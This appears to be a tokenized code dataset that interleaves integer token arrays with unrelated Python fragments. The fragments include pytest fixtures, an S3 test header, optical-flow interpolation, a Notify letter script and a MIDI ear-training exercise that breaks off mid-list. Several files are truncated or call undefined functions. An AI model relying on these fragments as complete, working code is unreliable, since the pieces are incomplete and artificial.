10786,
9288,
2994,
290,
9922,
25,
3256,
9922,
8,
198,
417,
361,
4876,
6624,
705,
79,
17407,
10354,
198,
220,
220,
220,
2746,
796,
3440,
62,
19849,
10786,
38888,
62,
8344,
519,
62,
4443,
39529,
62,
3605,
17,
13,
71,
20,
11537,
198,
220,
220,
220,
1255,
796,
2746,
13,
79,
17407,
62,
261,
62,
43501,
7,
9288,
62,
87,
8,
198,
220,
220,
220,
3601,
7,
20274,
8,
198,
198,
2,
422,
41927,
292,
13,
26791,
13,
4703,
62,
26791,
1330,
7110,
62,
19849,
198,
2,
7110,
62,
19849,
7,
19849,
11,
1462,
62,
7753,
2625,
19849,
62,
16,
13,
11134,
1600,
12860,
62,
1477,
7916,
28,
17821,
8,
198
] | 1.828922 | 3,589 |
import pytest
import torch
DEVICES = ["cpu"]
if torch.cuda.is_available():
DEVICES.append("cuda")
@pytest.fixture(params=DEVICES)
def device(request):
"""parametrized device function,
that returns string names of the devices
that ``torch`` considers "available".
causes any test using ``device`` fixture to run just once
if only a cpu is available,
and twice if ``torch.cuda.is_available()`` returns ``True``."""
return request.param
| [
11748,
12972,
9288,
198,
11748,
28034,
198,
198,
39345,
34444,
796,
14631,
36166,
8973,
198,
361,
28034,
13,
66,
15339,
13,
271,
62,
15182,
33529,
198,
220,
220,
220,
5550,
53,
34444,
13,
33295,
7203,
66,
15339,
4943,
628,
198,
31,
9078,
9288,
13,
69,
9602,
7,
37266,
28,
39345,
34444,
8,
198,
4299,
3335,
7,
25927,
2599,
198,
220,
220,
220,
37227,
17143,
316,
380,
8863,
3335,
2163,
11,
198,
220,
220,
220,
326,
5860,
4731,
3891,
286,
262,
4410,
198,
220,
220,
220,
326,
7559,
13165,
354,
15506,
14358,
366,
15182,
1911,
628,
220,
220,
220,
5640,
597,
1332,
1262,
7559,
25202,
15506,
29220,
284,
1057,
655,
1752,
198,
220,
220,
220,
611,
691,
257,
42804,
318,
1695,
11,
198,
220,
220,
220,
290,
5403,
611,
7559,
13165,
354,
13,
66,
15339,
13,
271,
62,
15182,
3419,
15506,
5860,
7559,
17821,
15506,
526,
15931,
198,
220,
220,
220,
1441,
2581,
13,
17143,
198
] | 3.032258 | 155 |
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the S3 Bucket API.
"""
import pytest
import time
import logging
import re
from typing import Generator
from dataclasses import dataclass
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_s3_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import BootstrapResources, get_bootstrap_resources
RESOURCE_PLURAL = "buckets"
CREATE_WAIT_AFTER_SECONDS = 10
MODIFY_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
@dataclass
@pytest.fixture(scope="function")
@service_marker | [
2,
15069,
6186,
13,
785,
3457,
13,
393,
663,
29116,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
11074,
921,
743,
198,
2,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
317,
4866,
286,
262,
198,
2,
13789,
318,
5140,
379,
198,
2,
198,
2,
220,
197,
2638,
1378,
8356,
13,
33103,
13,
785,
14,
43073,
17,
13,
15,
14,
198,
2,
198,
2,
393,
287,
262,
366,
43085,
1,
2393,
19249,
428,
2393,
13,
770,
2393,
318,
9387,
198,
2,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
42881,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
198,
2,
4911,
393,
17142,
13,
4091,
262,
13789,
329,
262,
2176,
3303,
15030,
198,
2,
21627,
290,
11247,
739,
262,
13789,
13,
198,
198,
37811,
34500,
1358,
5254,
329,
262,
311,
18,
48353,
7824,
13,
198,
37811,
198,
198,
11748,
12972,
9288,
198,
11748,
640,
198,
11748,
18931,
198,
11748,
302,
198,
6738,
19720,
1330,
35986,
198,
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
198,
198,
6738,
257,
694,
9288,
13,
37540,
1330,
4738,
62,
37333,
844,
62,
3672,
198,
6738,
257,
694,
9288,
13,
74,
23,
82,
1330,
8271,
355,
479,
23,
82,
198,
6738,
304,
17,
68,
1330,
2139,
62,
4102,
263,
11,
8740,
35,
62,
46846,
11,
8740,
35,
62,
43717,
11,
3440,
62,
82,
18,
62,
31092,
198,
6738,
304,
17,
68,
13,
35666,
5592,
62,
27160,
1330,
45285,
2246,
12529,
62,
23428,
35409,
198,
6738,
304,
17,
68,
13,
18769,
26418,
62,
37540,
1330,
18892,
26418,
33236,
11,
651,
62,
18769,
26418,
62,
37540,
198,
198,
19535,
31033,
62,
6489,
4261,
1847,
796,
366,
27041,
1039,
1,
198,
198,
43387,
6158,
62,
15543,
2043,
62,
8579,
5781,
62,
23683,
1340,
5258,
796,
838,
198,
33365,
5064,
56,
62,
15543,
2043,
62,
8579,
5781,
62,
23683,
1340,
5258,
796,
838,
198,
7206,
2538,
9328,
62,
15543,
2043,
62,
8579,
5781,
62,
23683,
1340,
5258,
796,
838,
198,
198,
31,
19608,
330,
31172,
198,
198,
31,
9078,
9288,
13,
69,
9602,
7,
29982,
2625,
8818,
4943,
198,
198,
31,
15271,
62,
4102,
263
] | 3.262873 | 369 |
import glob
import cv2
import regex as re
from .deep_optical_flow import deep_optical_flow
from .interpolations import warp_flow
from .parameters import *
def sphere_interpolation(model_path="./flownet2/pretrained_models/FlowNet2_checkpoint.pth.tar"):
"""
Sphere dataset interpolation of Frame N+1 from Frame N and Frame N+2
:param model_path: Path to pretrained optical flow model
:return: None
"""
images = glob.glob("./input/sphere/*.ppm")
images.sort(key=lambda f: int(re.sub("\D", "", f)))
for ind in range(0, len(images) - 2, 2):
firstImage = cv2.imread(images[ind])
secondImage = cv2.imread(images[ind + 2])
forward_flow, If = deep_optical_flow(model_path, firstImage, secondImage, LR, NUM_ITER, ind, "sphere")
backward_flow, Ib = deep_optical_flow(model_path, secondImage, firstImage, LR, NUM_ITER, ind, "sphere")
warp_flow(firstImage, secondImage, forward_flow, If, backward_flow, Ib, ind, "sphere")
| [
11748,
15095,
198,
11748,
269,
85,
17,
198,
11748,
40364,
355,
302,
198,
6738,
764,
22089,
62,
8738,
605,
62,
11125,
1330,
2769,
62,
8738,
605,
62,
11125,
198,
6738,
764,
3849,
16104,
602,
1330,
25825,
62,
11125,
198,
6738,
764,
17143,
7307,
1330,
1635,
628,
198,
4299,
16558,
62,
3849,
16104,
341,
7,
19849,
62,
6978,
28,
1911,
14,
2704,
593,
316,
17,
14,
5310,
13363,
62,
27530,
14,
37535,
7934,
17,
62,
9122,
4122,
13,
79,
400,
13,
18870,
1,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
31798,
27039,
39555,
341,
286,
25184,
399,
10,
16,
422,
25184,
399,
290,
25184,
399,
10,
17,
198,
220,
220,
220,
1058,
17143,
2746,
62,
6978,
25,
10644,
284,
2181,
13363,
18480,
5202,
2746,
198,
220,
220,
220,
1058,
7783,
25,
6045,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
4263,
796,
15095,
13,
4743,
672,
7,
1911,
14,
15414,
14,
2777,
1456,
15211,
13,
381,
76,
4943,
198,
220,
220,
220,
4263,
13,
30619,
7,
2539,
28,
50033,
277,
25,
493,
7,
260,
13,
7266,
7203,
59,
35,
1600,
366,
1600,
277,
22305,
628,
220,
220,
220,
329,
773,
287,
2837,
7,
15,
11,
18896,
7,
17566,
8,
532,
362,
11,
362,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
717,
5159,
796,
269,
85,
17,
13,
320,
961,
7,
17566,
58,
521,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1218,
5159,
796,
269,
85,
17,
13,
320,
961,
7,
17566,
58,
521,
1343,
362,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
2651,
62,
11125,
11,
1002,
796,
2769,
62,
8738,
605,
62,
11125,
7,
19849,
62,
6978,
11,
717,
5159,
11,
1218,
5159,
11,
37491,
11,
36871,
62,
2043,
1137,
11,
773,
11,
366,
2777,
1456,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
19528,
62,
11125,
11,
21089,
796,
2769,
62,
8738,
605,
62,
11125,
7,
19849,
62,
6978,
11,
1218,
5159,
11,
717,
5159,
11,
37491,
11,
36871,
62,
2043,
1137,
11,
773,
11,
366,
2777,
1456,
4943,
628,
220,
220,
220,
220,
220,
220,
220,
25825,
62,
11125,
7,
11085,
5159,
11,
1218,
5159,
11,
2651,
62,
11125,
11,
1002,
11,
19528,
62,
11125,
11,
21089,
11,
773,
11,
366,
2777,
1456,
4943,
198
] | 2.611111 | 378 |
import json
import logging
from typing import Tuple, Dict, Optional, Union, NamedTuple, IO
from lxml import objectify
from kloppy.domain import (
TrackingDataset,
DatasetFlag,
AttackingDirection,
Frame,
Point,
Point3D,
Team,
BallState,
Period,
Provider,
Orientation,
attacking_direction_from_frame,
Metadata,
Ground,
Player,
build_coordinate_system,
Provider,
Transformer,
PlayerData,
)
from kloppy.utils import Readable, performance_logging
from .deserializer import TrackingDataDeserializer
logger = logging.getLogger(__name__)
| [
11748,
33918,
198,
11748,
18931,
198,
6738,
19720,
1330,
309,
29291,
11,
360,
713,
11,
32233,
11,
4479,
11,
34441,
51,
29291,
11,
24418,
198,
198,
6738,
300,
19875,
1330,
2134,
1958,
198,
198,
6738,
479,
5439,
14097,
13,
27830,
1330,
357,
198,
220,
220,
220,
37169,
27354,
292,
316,
11,
198,
220,
220,
220,
16092,
292,
316,
34227,
11,
198,
220,
220,
220,
3460,
5430,
35,
4154,
11,
198,
220,
220,
220,
25184,
11,
198,
220,
220,
220,
6252,
11,
198,
220,
220,
220,
6252,
18,
35,
11,
198,
220,
220,
220,
4816,
11,
198,
220,
220,
220,
6932,
9012,
11,
198,
220,
220,
220,
18581,
11,
198,
220,
220,
220,
32549,
11,
198,
220,
220,
220,
35275,
341,
11,
198,
220,
220,
220,
9274,
62,
37295,
62,
6738,
62,
14535,
11,
198,
220,
220,
220,
3395,
14706,
11,
198,
220,
220,
220,
13706,
11,
198,
220,
220,
220,
7853,
11,
198,
220,
220,
220,
1382,
62,
37652,
4559,
62,
10057,
11,
198,
220,
220,
220,
32549,
11,
198,
220,
220,
220,
3602,
16354,
11,
198,
220,
220,
220,
7853,
6601,
11,
198,
8,
198,
198,
6738,
479,
5439,
14097,
13,
26791,
1330,
4149,
540,
11,
2854,
62,
6404,
2667,
198,
198,
6738,
764,
8906,
48499,
7509,
1330,
37169,
6601,
5960,
48499,
7509,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628,
198
] | 2.65368 | 231 |
"""Config flow to configure the Meteo-Swiss integration."""
import logging
import re
import voluptuous as vol
from homeassistant.const import CONF_NAME, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant import config_entries
from homeassistant.core import callback
from .const import DOMAIN,CONF_POSTCODE,CONF_STATION,CONF_ENABLESENSORS
from hamsclient import meteoSwissClient
_LOGGER = logging.getLogger(__name__)
| [
37811,
16934,
5202,
284,
17425,
262,
3395,
68,
78,
12,
10462,
747,
11812,
526,
15931,
198,
11748,
18931,
198,
198,
11748,
302,
198,
11748,
2322,
37623,
5623,
355,
2322,
198,
6738,
1363,
562,
10167,
13,
9979,
1330,
7102,
37,
62,
20608,
11,
7102,
37,
62,
43,
1404,
2043,
52,
7206,
11,
7102,
37,
62,
43,
18494,
2043,
52,
7206,
198,
6738,
1363,
562,
10167,
1330,
4566,
62,
298,
1678,
198,
6738,
1363,
562,
10167,
13,
7295,
1330,
23838,
198,
6738,
764,
9979,
1330,
24121,
29833,
11,
10943,
37,
62,
32782,
34,
16820,
11,
10943,
37,
62,
2257,
6234,
11,
10943,
37,
62,
1677,
6242,
28378,
16938,
20673,
198,
6738,
289,
4105,
16366,
1330,
47091,
78,
10462,
747,
11792,
628,
198,
198,
62,
25294,
30373,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628
] | 3.080882 | 136 |
from graphviz import Digraph
if __name__ == "__main__":
from chips.api.api import *
from chips.components.components import *
c = Chip("my_chip")
a = Input(c, "a")
b = Input(c, "b")
d = Input(c, "d")
e = Input(c, "e")
x, y = tee(c, add(c, add(c, a, b), add(c, d, e)))
discard(c, x)
discard(c, y)
b = BlockDiagram(c)
b.view()
| [
6738,
4823,
85,
528,
1330,
7367,
1470,
628,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
422,
12014,
13,
15042,
13,
15042,
1330,
1635,
198,
220,
220,
220,
422,
12014,
13,
5589,
3906,
13,
5589,
3906,
1330,
1635,
198,
220,
220,
220,
269,
796,
17869,
7203,
1820,
62,
35902,
4943,
198,
220,
220,
220,
257,
796,
23412,
7,
66,
11,
366,
64,
4943,
198,
220,
220,
220,
275,
796,
23412,
7,
66,
11,
366,
65,
4943,
198,
220,
220,
220,
288,
796,
23412,
7,
66,
11,
366,
67,
4943,
198,
220,
220,
220,
304,
796,
23412,
7,
66,
11,
366,
68,
4943,
198,
220,
220,
220,
2124,
11,
331,
796,
30479,
7,
66,
11,
751,
7,
66,
11,
751,
7,
66,
11,
257,
11,
275,
828,
751,
7,
66,
11,
288,
11,
304,
22305,
198,
220,
220,
220,
27537,
7,
66,
11,
2124,
8,
198,
220,
220,
220,
27537,
7,
66,
11,
331,
8,
198,
220,
220,
220,
275,
796,
9726,
18683,
6713,
7,
66,
8,
198,
220,
220,
220,
275,
13,
1177,
3419,
198
] | 2.054645 | 183 |
import smart_imports
smart_imports.all()
| [
198,
11748,
4451,
62,
320,
3742,
198,
198,
27004,
62,
320,
3742,
13,
439,
3419,
628
] | 2.75 | 16 |
import cuid, sys, os
from dotenv import load_dotenv
from notifications_python_client.notifications import NotificationsAPIClient
# Load .env
load_dotenv()
# Set up a new Notify client
notifications_client = NotificationsAPIClient(os.getenv("NOTIFY_KEY"))
# Generate a unique reference
id_gen = cuid.CuidGenerator()
id = id_gen.cuid()
# Get the file redirected to stdin (as a binary file)
input = sys.stdin.buffer.read()
with open(id, "wb") as output:
output.write(input)
# Convert from PostScript to PDF (has the effect of stripping out PCL which Notify doesn't like)
os.system("ps2pdf {} {}.pdf".format(id, id))
# Try to send a letter
with open("{}.pdf".format(id), "rb") as file_to_send:
notification = notifications_client.send_precompiled_letter_notification(
reference=id, pdf_file=file_to_send
)
print(notification)
# Delete local files
os.remove(id)
os.remove("{}.pdf".format(id)) | [
11748,
18912,
312,
11,
25064,
11,
28686,
198,
6738,
16605,
24330,
1330,
3440,
62,
26518,
24330,
198,
6738,
19605,
62,
29412,
62,
16366,
13,
1662,
6637,
1330,
1892,
6637,
2969,
2149,
75,
1153,
198,
198,
2,
8778,
764,
24330,
198,
2220,
62,
26518,
24330,
3419,
198,
198,
2,
5345,
510,
257,
649,
1892,
1958,
5456,
220,
198,
1662,
6637,
62,
16366,
796,
1892,
6637,
2969,
2149,
75,
1153,
7,
418,
13,
1136,
24330,
7203,
11929,
5064,
56,
62,
20373,
48774,
198,
198,
2,
2980,
378,
257,
3748,
4941,
220,
198,
312,
62,
5235,
796,
18912,
312,
13,
34,
27112,
8645,
1352,
3419,
198,
312,
796,
4686,
62,
5235,
13,
66,
27112,
3419,
198,
198,
2,
3497,
262,
2393,
45158,
284,
14367,
259,
357,
292,
257,
13934,
2393,
8,
198,
15414,
796,
25064,
13,
19282,
259,
13,
22252,
13,
961,
3419,
198,
4480,
1280,
7,
312,
11,
366,
39346,
4943,
355,
5072,
25,
198,
220,
220,
5072,
13,
13564,
7,
15414,
8,
198,
198,
2,
38240,
422,
2947,
7391,
284,
12960,
357,
10134,
262,
1245,
286,
37727,
503,
4217,
43,
543,
1892,
1958,
1595,
470,
588,
8,
198,
418,
13,
10057,
7203,
862,
17,
12315,
23884,
23884,
13,
12315,
1911,
18982,
7,
312,
11,
4686,
4008,
198,
198,
2,
9993,
284,
3758,
257,
3850,
198,
4480,
1280,
7203,
90,
27422,
12315,
1911,
18982,
7,
312,
828,
366,
26145,
4943,
355,
2393,
62,
1462,
62,
21280,
25,
198,
220,
220,
220,
14483,
796,
19605,
62,
16366,
13,
21280,
62,
3866,
5589,
3902,
62,
9291,
62,
1662,
2649,
7,
198,
220,
220,
220,
220,
220,
220,
220,
4941,
28,
312,
11,
37124,
62,
7753,
28,
7753,
62,
1462,
62,
21280,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
3601,
7,
1662,
2649,
8,
198,
198,
2,
23520,
1957,
3696,
220,
198,
418,
13,
28956,
7,
312,
8,
198,
418,
13,
28956,
7203,
90,
27422,
12315,
1911,
18982,
7,
312,
4008
] | 2.893082 | 318 |
'''
リストモジュール
'''
def split_list(elements: list, num_of_elements: int) -> list[list]:
'''
リスト分割
Args:
elements (list) : 要素リスト
num_of_elements (int) : 分割単位の要素数
Returns:
list[list]: 分割結果リスト
'''
items_list: list[list] = \
[elements[index : index + num_of_elements]
for index in range(0, len(elements), num_of_elements)]
return items_list
| [
7061,
6,
201,
198,
12675,
43302,
40361,
21091,
24440,
43353,
201,
198,
7061,
6,
201,
198,
201,
198,
201,
198,
4299,
6626,
62,
4868,
7,
68,
3639,
25,
1351,
11,
997,
62,
1659,
62,
68,
3639,
25,
493,
8,
4613,
1351,
58,
4868,
5974,
201,
198,
220,
220,
220,
705,
7061,
201,
198,
220,
220,
220,
220,
12675,
43302,
26344,
228,
30298,
110,
201,
198,
220,
220,
220,
220,
201,
198,
220,
220,
220,
943,
14542,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4847,
357,
4868,
8,
220,
220,
220,
220,
220,
220,
220,
220,
1058,
5525,
99,
223,
163,
112,
254,
12675,
43302,
201,
198,
220,
220,
220,
220,
220,
220,
220,
997,
62,
1659,
62,
68,
3639,
357,
600,
8,
220,
220,
1058,
10263,
230,
228,
30298,
110,
39355,
246,
19526,
235,
5641,
17358,
223,
163,
112,
254,
46763,
108,
201,
198,
220,
220,
220,
220,
201,
198,
220,
220,
220,
16409,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1351,
58,
4868,
5974,
10263,
230,
228,
30298,
110,
163,
113,
238,
162,
252,
250,
12675,
43302,
201,
198,
220,
220,
220,
705,
7061,
201,
198,
220,
220,
220,
220,
201,
198,
220,
220,
220,
3709,
62,
4868,
25,
1351,
58,
4868,
60,
796,
3467,
201,
198,
220,
220,
220,
220,
220,
220,
220,
685,
68,
3639,
58,
9630,
1058,
6376,
1343,
997,
62,
1659,
62,
68,
3639,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
6376,
287,
2837,
7,
15,
11,
18896,
7,
68,
3639,
828,
997,
62,
1659,
62,
68,
3639,
15437,
201,
198,
220,
220,
220,
220,
201,
198,
220,
220,
220,
1441,
3709,
62,
4868,
201,
198
] | 1.614035 | 285 |
#!/usr/bin/env python3
def object_adder(a, b):
"""Adds two object together"""
if type(a) is not int or type(b) is not int:
raise TypeError("Object is not of type int")
return a + b
import sys
print(sys.argv)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
4299,
2134,
62,
26676,
7,
64,
11,
275,
2599,
198,
220,
220,
220,
37227,
46245,
734,
2134,
1978,
37811,
198,
220,
220,
220,
611,
2099,
7,
64,
8,
318,
407,
493,
393,
2099,
7,
65,
8,
318,
407,
493,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5298,
5994,
12331,
7203,
10267,
318,
407,
286,
2099,
493,
4943,
198,
220,
220,
220,
1441,
257,
1343,
275,
198,
198,
11748,
25064,
198,
4798,
7,
17597,
13,
853,
85,
8,
198
] | 2.527473 | 91 |
from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.core.cache import cache
from posts.models import Post, Group
User = get_user_model()
index = '/'
group = 'group'
test_slug = 'test_slug'
fake_slug = 'fake_slug'
new_post = 'new'
post_edit = 'edit'
post_delete = 'delete'
follow_index = 'follow'
profile_follow = 'follow'
profile_unfollow = 'unfollow'
post_author = 'post_author'
another_user = 'another_user'
fake_author = 'fake_author'
login = 'auth/login'
| [
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
1330,
651,
62,
7220,
62,
19849,
198,
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
11,
20985,
198,
6738,
42625,
14208,
13,
7295,
13,
23870,
1330,
12940,
198,
198,
6738,
6851,
13,
27530,
1330,
2947,
11,
4912,
198,
198,
12982,
796,
651,
62,
7220,
62,
19849,
3419,
198,
198,
9630,
796,
31051,
6,
198,
8094,
796,
705,
8094,
6,
198,
9288,
62,
6649,
1018,
796,
705,
9288,
62,
6649,
1018,
6,
198,
30706,
62,
6649,
1018,
796,
705,
30706,
62,
6649,
1018,
6,
198,
3605,
62,
7353,
796,
705,
3605,
6,
198,
7353,
62,
19312,
796,
705,
19312,
6,
198,
7353,
62,
33678,
796,
705,
33678,
6,
198,
27780,
62,
9630,
796,
705,
27780,
6,
198,
13317,
62,
27780,
796,
705,
27780,
6,
198,
13317,
62,
403,
27780,
796,
705,
403,
27780,
6,
198,
7353,
62,
9800,
796,
705,
7353,
62,
9800,
6,
198,
29214,
62,
7220,
796,
705,
29214,
62,
7220,
6,
198,
30706,
62,
9800,
796,
705,
30706,
62,
9800,
6,
198,
38235,
796,
705,
18439,
14,
38235,
6,
628
] | 2.838889 | 180 |
from typing import AbstractSet
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.conf import settings
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
| [
6738,
19720,
1330,
27741,
7248,
201,
198,
6738,
42625,
14208,
13,
9945,
1330,
4981,
201,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
13,
27530,
1330,
27741,
12982,
201,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
201,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
9575,
201,
198,
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
651,
5239,
62,
75,
12582,
355,
4808,
201,
198,
220,
220,
220,
220,
201,
198,
201,
198
] | 3.28 | 75 |
from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rtyper.tool import rffi_platform
from rpython.translator.platform import CompilationError
eci = ExternalCompilationInfo(
post_include_bits=["""
// we need to disable optimizations so the compiler does not remove this
// function when checking if the file compiles
static void __attribute__((optimize("O0"))) pypy__arm_has_vfp()
{
asm volatile("VMOV s0, s1");
}
"""])
def detect_float():
"""Check for hardware float support
we try to compile a function containing a VFP instruction, and if the
compiler accepts it we assume we are fine
"""
try:
rffi_platform.verify_eci(eci)
return True
except CompilationError:
return False
| [
6738,
374,
29412,
13,
7645,
41880,
13,
25981,
13,
66,
11249,
1330,
34579,
7293,
10520,
12360,
198,
6738,
374,
29412,
13,
81,
774,
525,
13,
297,
19199,
6781,
1330,
32660,
4906,
11,
374,
487,
72,
198,
6738,
374,
29412,
13,
81,
774,
525,
13,
25981,
1330,
374,
487,
72,
62,
24254,
198,
6738,
374,
29412,
13,
7645,
41880,
13,
24254,
1330,
3082,
10520,
12331,
198,
198,
721,
72,
796,
34579,
7293,
10520,
12360,
7,
198,
220,
220,
220,
1281,
62,
17256,
62,
9895,
28,
14692,
15931,
198,
1003,
356,
761,
284,
15560,
41446,
523,
262,
17050,
857,
407,
4781,
428,
198,
1003,
2163,
618,
10627,
611,
262,
2393,
552,
2915,
198,
12708,
7951,
11593,
42348,
834,
19510,
40085,
1096,
7203,
46,
15,
1,
22305,
279,
4464,
88,
834,
1670,
62,
10134,
62,
85,
46428,
3419,
198,
90,
198,
220,
220,
220,
355,
76,
22750,
7203,
15996,
8874,
264,
15,
11,
264,
16,
15341,
198,
92,
198,
220,
220,
220,
13538,
8973,
8,
198,
198,
4299,
4886,
62,
22468,
33529,
198,
220,
220,
220,
37227,
9787,
329,
6890,
12178,
1104,
198,
220,
220,
220,
356,
1949,
284,
17632,
257,
2163,
7268,
257,
569,
5837,
12064,
11,
290,
611,
262,
198,
220,
220,
220,
17050,
18178,
340,
356,
7048,
356,
389,
3734,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
374,
487,
72,
62,
24254,
13,
332,
1958,
62,
721,
72,
7,
721,
72,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
6407,
198,
220,
220,
220,
2845,
3082,
10520,
12331,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
10352,
198
] | 2.989051 | 274 |
from helios.chains.ropsten import (
RopstenFullChain,
RopstenLightDispatchChain,
)
from helios.nodes.light import LightNode
from helios.nodes.full import FullNode
| [
6738,
932,
4267,
13,
38861,
13,
1773,
26400,
1330,
357,
198,
220,
220,
220,
371,
404,
26400,
13295,
35491,
11,
198,
220,
220,
220,
371,
404,
26400,
15047,
49354,
35491,
11,
198,
8,
198,
6738,
932,
4267,
13,
77,
4147,
13,
2971,
1330,
4401,
19667,
198,
6738,
932,
4267,
13,
77,
4147,
13,
12853,
1330,
6462,
19667,
628,
198
] | 2.932203 | 59 |
import icedata
from icevision.all import *
| [
11748,
220,
3711,
1045,
198,
6738,
4771,
10178,
13,
439,
1330,
1635,
628
] | 3.384615 | 13 |
#!/usr/bin/python
# Written by Stjepan Horvat
# ( [email protected] )
# by the exercises from David Lucal Burge - Perfect Pitch Ear Traning Supercourse
# Thanks to Wojciech M. Zabolotny ( [email protected] ) for snd-virmidi example
# ( [email protected] )
import random
import time
import sys
import re
fname="/dev/snd/midiC2D0"
#fname=sys.argv[1]
fin=open(fname,"rb")
fout=open(fname,"wb")
#keymin=int(sys.argv[2])
#keymax=int(sys.argv[3])
#keymin=int(60)
#keymax=int(72)
#c major scale
print ("Exercise 7-4:")
print ("C D and E. Harmonic and melodic pitch indentification. Melodic doubles.")
#from c to c'' white tones
#c major scale
#notes = [ 36, 38, 40, 41, 43, 45, 47, 48, 50, 52, 53, 55, 57, 59, 60, 62, 64, 65, 67, 69, 71, 72, 74, 76, 77, 79, 81, 83, 84, 86, 88, 89, 91, 93, 95, 96 ]
notes = [ 36, 38, 40, 48, 50, 52, 60, 62, 64, 72, 74, 76, 84, 86, 88, 96 ]
noteC = [ 36, 48, 60, 72, 84, 96 ]
usage = "Usage: 1-repeat, <note> <note> \"c d\", ?-usage."
round = 1
a = re.compile("^[c-e] [c-e]$")
try:
print(usage)
while True:
noteOne = random.choice(notes)
while True:
noteTwo = random.choice(notes)
if nameNote(noteOne) != nameNote(noteTwo) and noteOne < noteTwo:
break
match = False
while not match:
done = False
playTwoNotes(noteOne, noteTwo)
while not done:
n = input("? ")
if n == "1":
playTwoNotes(noteOne, noteTwo)
if n == "?":
print(usage)
#TODO:bug da prima sve umjesto samo imena nota
elif a.match(n):
splitNote = n.split()
if splitNote[0] == nameNote(noteOne).lower() and splitNote[1] == nameNote(noteTwo).lower():
round += 1
print("Correct. Next round. " + str(round) + ".:")
done = True
match = True
else:
playTwoNotes(name2Note(splitNote[0]), name2Note(splitNote[1]))
except KeyboardInterrupt:
pass
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
22503,
416,
520,
73,
538,
272,
6075,
85,
265,
198,
2,
357,
1976,
10438,
301,
891,
272,
31,
14816,
13,
785,
1267,
198,
2,
416,
262,
13565,
422,
3271,
7598,
282,
5481,
469,
532,
16374,
33517,
2905,
833,
7574,
3115,
17319,
198,
2,
6930,
284,
370,
13210,
66,
494,
354,
337,
13,
1168,
28426,
313,
3281,
357,
266,
89,
397,
31,
786,
13,
79,
86,
13,
15532,
13,
489,
1267,
329,
264,
358,
12,
85,
2533,
19830,
1672,
198,
2,
357,
266,
89,
397,
31,
786,
13,
79,
86,
13,
15532,
13,
489,
1267,
198,
198,
11748,
4738,
198,
11748,
640,
198,
11748,
25064,
198,
11748,
302,
198,
198,
69,
3672,
35922,
7959,
14,
82,
358,
14,
13602,
72,
34,
17,
35,
15,
1,
198,
2,
69,
3672,
28,
17597,
13,
853,
85,
58,
16,
60,
198,
15643,
28,
9654,
7,
69,
3672,
553,
26145,
4943,
198,
69,
448,
28,
9654,
7,
69,
3672,
553,
39346,
4943,
198,
2,
2539,
1084,
28,
600,
7,
17597,
13,
853,
85,
58,
17,
12962,
198,
2,
2539,
9806,
28,
600,
7,
17597,
13,
853,
85,
58,
18,
12962,
198,
2,
2539,
1084,
28,
600,
7,
1899,
8,
198,
2,
2539,
9806,
28,
600,
7,
4761,
8,
198,
198,
2,
66,
1688,
5046,
198,
4798,
5855,
3109,
23697,
767,
12,
19,
25,
4943,
198,
4798,
5855,
34,
360,
290,
412,
13,
17925,
9229,
290,
7758,
29512,
7078,
33793,
2649,
13,
5616,
29512,
21938,
19570,
198,
2,
6738,
269,
284,
269,
7061,
2330,
23755,
198,
198,
2,
66,
1688,
5046,
198,
2,
17815,
796,
685,
4570,
11,
4353,
11,
2319,
11,
6073,
11,
5946,
11,
4153,
11,
6298,
11,
4764,
11,
2026,
11,
6740,
11,
7192,
11,
5996,
11,
7632,
11,
7863,
11,
3126,
11,
8190,
11,
5598,
11,
6135,
11,
8275,
11,
8644,
11,
9166,
11,
7724,
